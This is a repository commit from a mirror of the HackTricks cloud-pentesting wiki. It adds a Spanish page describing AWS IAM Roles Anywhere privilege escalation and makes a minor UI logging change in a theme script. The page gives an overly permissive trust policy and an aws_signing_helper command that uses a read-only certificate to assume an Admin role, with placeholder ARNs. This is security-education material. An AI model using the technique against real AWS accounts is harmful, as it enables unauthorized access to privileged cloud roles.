gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-07 19:00:49 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/aws-security/aws-privilege-escalation/

Browse Source
This commit is contained in:
Translator
2025-06-24 14:00:33 +00:00
parent 28569b0f2b
commit b6bee3cc89
2 changed files with 43 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

42
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md Normal file
View File

@@ -0,0 +1,42 @@
# AWS - IAM Roles Anywhere Privesc
{{#include ../../../../banners/hacktricks-training.md}}
AWS IAM RolesAnywhere permite que cargas de trabajo fuera de AWS asuman roles de IAM utilizando certificados X.509. Pero cuando las políticas de confianza no están adecuadamente definidas, pueden ser abusadas para la escalada de privilegios.
Esta política carece de restricciones sobre qué ancla de confianza o atributos de certificado están permitidos. Como resultado, cualquier certificado vinculado a cualquier ancla de confianza en la cuenta puede ser utilizado para asumir este rol.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "rolesanywhere.amazonaws.com"
},
"Action": [
"sts:AssumeRole",
"sts:SetSourceIdentity",
"sts:TagSession"
]
}
]
}
```
Para privesc, se requiere el `aws_signing_helper` de https://docs.aws.amazon.com/rolesanywhere/latest/userguide/credential-helper.html
Luego, utilizando un certificado válido, el atacante puede pivotar hacia el rol de mayor privilegio.
```bash
aws_signing_helper credential-process \
--certificate readonly.pem \
--private-key readonly.key \
--trust-anchor-arn arn:aws:rolesanywhere:us-east-1:123456789012:trust-anchor/ta-id \
--profile-arn arn:aws:rolesanywhere:us-east-1:123456789012:profile/default \
--role-arn arn:aws:iam::123456789012:role/Admin
```
### Referencias
- https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation/
{{#include ../../../../banners/hacktricks-training.md}}

2
theme/ai.js
View File

@@ -226,7 +226,7 @@
`threadId=${threadId}; Path=/; Secure; SameSite=Strict; Max-Age=7200`; `threadId=${threadId}; Path=/; Secure; SameSite=Strict; Max-Age=7200`;
} catch (e) { } catch (e) {
console.error("Error creating threadId:", e); console.error("Error creating threadId:", e);
alert("Failed to initialise the conversation. Please refresh."); console.log("Failed to initialise the conversation. Please refresh.");
throw e; throw e;
} }
} }